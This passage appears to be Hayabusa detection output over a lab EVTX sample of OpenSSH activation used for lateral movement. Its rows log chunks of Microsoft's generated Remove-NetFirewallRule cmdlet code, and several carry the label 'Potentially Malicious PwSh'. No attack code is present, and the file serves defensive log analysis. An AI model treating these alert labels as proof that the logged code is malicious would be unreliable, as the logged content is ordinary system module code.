($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 
+00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } 
} catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 